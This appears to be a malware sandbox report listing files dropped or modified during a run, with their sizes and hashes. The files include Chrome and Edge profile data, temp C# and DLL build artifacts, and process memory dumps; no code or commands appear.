C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
432B

MD5
fe224db8c2548a9cba07c5d7fc61979c

SHA1
a61c9c770884c0db741c07406599642494a2ae7e

SHA256
0443ff032c89626ee18c96ff1e29ed8521854139bb74a46efed6e5974976d2a5

SHA512
3ab28c2aef47acbcd0995c9fd5edd6c87d928f7944834c719db1d36c26c9dbd1c68efe574f9da98d9def9b8ea12c4f31724d7cf44d58dc2aeaab73ddb945ccae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
31a0ed61e3743d48ae083fc7902b5fab

SHA1
2433483db3a67a550d5c2fa8b0966ce33219ab18

SHA256
173e731fed2024a3180ad5fa4ae4e3d5730a424d6efd1122935bd24c319f0506

SHA512
4550db404edfe86f6a5261220320095649a8a83ca9072c040fba465350856b0f6e99049c56bb4d27f21391289cb42db6ac11fa946f94034bcf9a527bbc408391

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
78276eec7d3eebd6737c33233b78924d

SHA1
bd360a77c5c6d702f94da2793e95f9243019ca1d

SHA256
4ced18b1b91731f6cd304fec471c3aa26c5d478375cc5a44cd968cd770b60f0a

SHA512
d1b268347142642ac6759927a8fa843b3bac9b310884b78913451482de9017db92b207e1ca0103f954ebe64ac0fbc33cc3f23f979884a63b53ba4ec0f86d42a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
940e8117d3dbee469211341cc2ea3bf0

SHA1
7206afe19c3e2a613a3f2c6d4903b55c09e878c8

SHA256
fc6543b46cdf2fdff4040937fcd7a4c9cb3a011c3d6dcbc84271ebef12dca968

SHA512
4a5aeac3f795c0c841f9668a9ca2ae31ffd83554d8d9f97e9ce4062fbaed8f1f78858cb0e909ea057814b3beeb6b1066fa4a5ef48f11e751ab78aa50a227b8b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
dc56d6551f6bd468495bfe3106404cae

SHA1
f36e6e0a3b16e8e5e7fb5228fc800fb997ac5b94

SHA256
9d4f5752d907a054a66a90305f7c1be85d01fb2a53f756c817c01ee64088eb52

SHA512
871789258ae9a6e127c70e0fffd439385b52bfcd4c86e424d3fc1c54b56ceb9a03b316cadfa41e43d8bf3ccf238c63a0263b673e2ebf9ebc2db7cfe5bc464781

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
cda3456e69cf3e310f6891bc85782b19

SHA1
237691fd6d54b4f1833de177bdfbf6c06a710c7b

SHA256
909a68d44d284321e6d360482ded454380216265001f466eac0e7622325d0981

SHA512
d64f0e72f0b25cd30a92f7f9034912cff21a5d715b3e8f2f3cba57c07acbb0d4d45da8e7cb8a57365dad102f4dea47f6753c65ced90bebed24f9568bdf929aef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
3341fc293e0b2d9b975d7e219e9e98a6

SHA1
ea75f4763b9ce55a7a483bdf2065cbeccb607cbc

SHA256
6ee8185dff14df94efad33d665fef7b30d9d78a2cc346fbed51c550f2c1a0390

SHA512
7b892e2fa360653dd17a424fff17fed83df7540f83e2406c6513c95264d9feadda66f635e08f60fae32d77e46207c0de9968084981c92c6939688ae9f42238ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
aed49600377453cf14927ec8a3e67401

SHA1
aa114c35154590a0fe5f09f756b656ee80e09aad

SHA256
33704f8d8c8a0e273db1be6da7d1dea814049cb9303ecde849b1467d47ec9a34

SHA512
2cb44a3af36257b09dda696f9824f00c966a1fdbd5e5d9ac5414bf2784c9089db6df7317d0da4a3635b7daaa7bff03d435ce23f7247e3b1b6a94cc35116addd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
cdae2129c392732985fe2eb8a6ea6510

SHA1
edaa9ab9cab3bbbcd3e7a551a217925ab4281563

SHA256
7201f1b1dfe2b47eb570961a24e6988988855dd5f02b930c46cc948789752c7a

SHA512
8cd4082e1a1ee6630ac3e96ddf037b054708e3c14e42861e9f17a276fbea9224e73847abbaf7cc93a3e0d0f50244cd284b6b5cd4bf9a4799442c87122f177a9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0c826d6d589441acbaa68f280e593fe9

SHA1
558aef5301a5c3a19a4e71ae194b78c959fe4e57

SHA256
bcd61833872f7bbb6bbf3047b22bc0e213d48d223dba8f97cf6183bcb98afebb

SHA512
06737129abbd0d8e205c4bf530f57fda8e4bed766829f838f5fa25caabba4396b73e3fe11d12b30145d1605e348a2e595a1de342bbdc0c7d58a0f894bde79f2b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3aa53a74ef14fba9f6af7b02d38c400e

SHA1
44b41904ccc1b7aa3435dcb0643e8f99b45affc7

SHA256
310ba3137098201e4cbf1848107038722562ece445a4418494d2fc9b05d81a0e

SHA512
efbe5a13894f23ac75091882f9e705418a9bc5540bf4bfd495db1136c46d9650cd1abfaae5883a4b64971c31b4554c2860465d79c5f6274bb539687aeed65e55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
caee3482d7d142f51a1af78c26be9c35

SHA1
de6b0372919946d98eeb6b84610e282fae541cc3

SHA256
57c38aff0f9841de0ee2cb8c4f36cc281f8c63a9776df085a192eb1cbe1823b5

SHA512
e2c4bfbee2733b5a649737fb09e8eddf8d724ec3ea246e60e702bf27d963ccc08d438102c1e36a6fecfa817eafb91d35b5f1ebb84dcf3122095a25d02ef448e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
57f08a8416924dccddccef4faf05643f

SHA1
13e16caf4f005645cb39f0a8056627ed09c5cbfa

SHA256
6aa1391501b1e0426d62357c34783c7f421a02dd061d9fd96ce701dadb8e6f35

SHA512
65687b9f553f175f8ed101d9d727b5a03152328d86cfcb15aba1cc35b9a4971020f736f0a6e6e7dd1ddb928813ecb738145a95c32fcca5609687d1c448f707a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
303f94a548df220d5f9540ad923f76a6

SHA1
a44c30d723602d4244dc8d123ac3a0941d4ffe9a

SHA256
f09041b2caaf39472876d1952a43d107401bafeac5c4d1298e512ba8b5778d65

SHA512
dc028963a3c1c25789f8a87ab0be24091c26a513d09aada77e86ef26baaaf6c4b21e116bc2d131ae0fc20d72c828234ef54ac1514f9eac926883675c56f5204b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
591cea35d2bc121475918c46cb7a27f0

SHA1
33c57b9f213ec5ff28f429689fa75731ca1cb581

SHA256
db99c2a4d8b4f06d4c552c5c45ab0c2b28de45b5614e39af7c0ee7c71da63266

SHA512
7f97d5ba2b809be0d11bb21d0188123dc8229f8729b55fbb3a518bc0ae4f94659fe67e453f396d54bffde52b38fa2588ab2c722d8094d2d2dd14335962f77fc9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
563a3465847570044665dd5d110569cf

SHA1
abb0e4a1ba93c842dcee1862d1d80eac24273c99

SHA256
cba7abe1482cda9a3a90075da52bdf246f7f7b2159cba79f9eeb659ee2238aa3

SHA512
e477925b8f43480444b0e0f88638cfaf0d66417340e676489f97f8c7faa09fa2a0d9e4dbcdd2e87b01fba346655511ba37d92d39cb802dd528ce475eb7f60aaa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
309108495f73cf0eb0a1a1a6e6bfac32

SHA1
a94611d18a9925a6dbe59ac4e3baea425689b669

SHA256
293d90579bfa8821e2a53ec36a8372eb01e064ccbb95bd0e42137e8ad7696a5d

SHA512
5b9b90e45e5f5773a26fd743453c1906905c031ae3bcfd27f1b0ddce750bc0c50b2e75c6a27b1b25489c7ead89304d5f0972ff6385bea4d091d614d18ccb19dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
71678a9de9a3336190ff95537cd87a7b

SHA1
9e213afb4f6397c8e64c2bcb8cd36931845a0474

SHA256
ac58d2d4beb00dc62fb0a5b50cac02d2529cb51733065ca5f1763bd810371c3c

SHA512
5f402598e4533d1a25e802353387725753ce54c7638515f91d80db2eed13ee9a676ae401e47ab424f57bdd5f3d6b75e577027fee10ded7cea0d99cbbd3c0c937

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e77abac3d03f5b27ca6d587bff7cfce4

SHA1
2398274b1f425b428b6860d225d691ccd6cac355

SHA256
eb56f6b62d68039ebff870d1968be6d2499c3ef9046555c20b1623eaeadf5c03

SHA512
bfb7aa7973e3ef57df95a42c7ce0e7ec1fa4afe0276802f38f3791e4a4d2aa9af300887fbca7297b75276415ecae7cc7ac0c413a3c95345e7b3354407c770a7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
184B

MD5
4628d0f660fa0ad6d75340b6278566c5

SHA1
5e3116098708a0f147edb5097fb2f26405a213a6

SHA256
5163c370438b5ce156c9c7adde508869b1449b394295838eb9e6fd906adb6bfa

SHA512
3ce42af7b220756daad9fff23d329400b6365975770f661f73764152b5518639ff24c44f1ac0049ca56057269bc8f2b83d45dea7976944310ef6428cc9f0175c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b1f8c069fa8fdb9a987723cd4a9b761a

SHA1
844d8c8c4af9595b444d0d447f16365b3370c103

SHA256
4eaed6e3c1f3abca9f6994ef4e6610ebce81ec83465eafa37dd0d4dcba59e5a8

SHA512
62b7210a424e5913b3590d7ebfec1763688ea6b6a584eda36b666b6a3e410d3be21345a878e0864b22cf4573384b157a3fca06991e5e586ce321f919f06cbe27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
54e80d0afc44f520b6664bdcfbacd648

SHA1
ffba26443a7979ee36a611c1dd39337d995e0689

SHA256
f427e5669a8af0762d928415c944d2d75b8f45ab5f344d9c5c0972a8cbbc9cff

SHA512
536fc8aca27966ee8d2a6681779c789721bedb9c3784e07c25944928dcfcea8bea2c04cc41ff15843983dfa8cf24ceb2350298da5d4eaec53904a7f1fe55f12a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
4b1e7acd32825c7f744f494e7081e758

SHA1
eed26dc816512e0fa20db9c7d3fe946a2d7fe516

SHA256
253253417e3ebff861efe55924d12a6508f7a322b2c0cfa79fb8ec635cef9ffb

SHA512
d8c055b43d75b029908d10cb2d5310f99fdfaa741a406bd9cb2c6a7d606eaa1373dc8ae256403572ef9dbf60315505134fc668c9525cf76638c895a5d2f083c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
eca319e2a7c8c507ad81698c3b03be62

SHA1
ef18143d7aa8ac7489f88abcf158261e899bfba3

SHA256
c5bd1c636a0064e765fd16743ba7589e0613cca16cd45ada3a0f3e9cb432f470

SHA512
c5c85f5aab949224f865f1ff630bb99b7a32fd3db9b4ef58382832a3c4e311bea7b1fe4205a9f38796177fa99623eb190f902eae02d8468213abe1d6880c3731

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8236.tmp

Filesize
1KB

MD5
77fc985529598fa32e8751aed6c06caa

SHA1
b116dfa52f9852105edcddc3bd3f98ac2d62490d

SHA256
dc5bcf989d00a1953111aa152238bd6e0fde22b8de3f3c05438e9e8962714f7e

SHA512
e0173886e0d4155f8d8a8231edfd420a5cc556d13c0f55f9efc37dbbe05e43c8021ca49ad709ae1aefd2d7d13e82d4e4d94eaebb3e374a59ff726007420dc8d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1lp4ls1.iz4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s1plahhk\s1plahhk.dll

Filesize
41KB

MD5
4711e4c09e28397d60fa1771907baf4b

SHA1
d00a34d52f575d2be646477db2940726de79fee8

SHA256
c0f25b153bd4024d31826bf7953b9b92b1758bea65531ddb786e63f4f5eef3b1

SHA512
ace7b0acfa7eafbcc0b2887837a0086fe089a9e301c3e865c55a19ab10a0f4fa0f6f253154c50b49a829ad7c5983c4e10945163daedbef53790d06ace7f78b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s1plahhk\CSC854BC1905FE447A3B47E5D9BF2734D87.TMP

Filesize
652B

MD5
f5bd0e39d81cc08db027221cfdf9360e

SHA1
7f89cad7a51bbfb8641a7593626637b8c7b2c4aa

SHA256
e3f853209e3b3d4c5f74272db049282415cff28935f9cb6131d39f90a0468706

SHA512
419b5ecfc15181dc5e06f0d4a8b60be44961ce5697b6781a3d31cac45ae8a013c6eb29d25a203fe54d25e947396ccdb1e1f7343135bdc1140786edf45c127f33

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s1plahhk\s1plahhk.0.cs

Filesize
101KB

MD5
cba2847534e58636a5292dc393b45fdd

SHA1
ffd2fc63507cfee641ba53038d3f017a6ededbee

SHA256
33561d11060d90e7a1d49d19e395fd943c2500af98521412d2390b43b6cec6bd

SHA512
1b9bd2957ffe364788abcca1d90f2deb4634c89eea0a07e6a203573ed606df95b3e28ce41de038badaef674b2a8606fb8370abb3d9697b45f80f82d5e89ec1d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s1plahhk\s1plahhk.cmdline

Filesize
204B

MD5
4f6fd8619419eb79783d305df819482b

SHA1
7ee5b6095e18194eda0481972ec9c5317950a6f2

SHA256
bffa2a02c91f5ea3ea0c643819c35bbe8805499773ad796c75dbee4bc890c3c0

SHA512
514910aace0e353f7e12ad33ac4b1fa7d51b5fd7ca19a4978030833ce2e6601e08c9d555603ba2bf2286099dded3748fe845bc93a4620b9564e4f887f537f3c0

Download Submit
memory/324-294-0x0000000006E50000-0x00000000073F4000-memory.dmp

Filesize
5.6MB

Download
memory/324-293-0x0000000006800000-0x0000000006892000-memory.dmp

Filesize
584KB

Download
memory/324-276-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/324-254-0x00000000056E0000-0x000000000577C000-memory.dmp

Filesize
624KB

Download
memory/324-250-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2964-246-0x000001A2DDB60000-0x000001A2DE621000-memory.dmp

Filesize
10.8MB

Download
memory/4824-234-0x000001FE63CA0000-0x000001FE63CF4000-memory.dmp

Filesize
336KB

Download
memory/4824-229-0x000001FE63B40000-0x000001FE63B62000-memory.dmp

Filesize
136KB

Download
memory/4824-253-0x000001FE640D0000-0x000001FE64B91000-memory.dmp

Filesize
10.8MB

Download
memory/4824-248-0x000001FE63B30000-0x000001FE63B40000-memory.dmp

Filesize
64KB

Download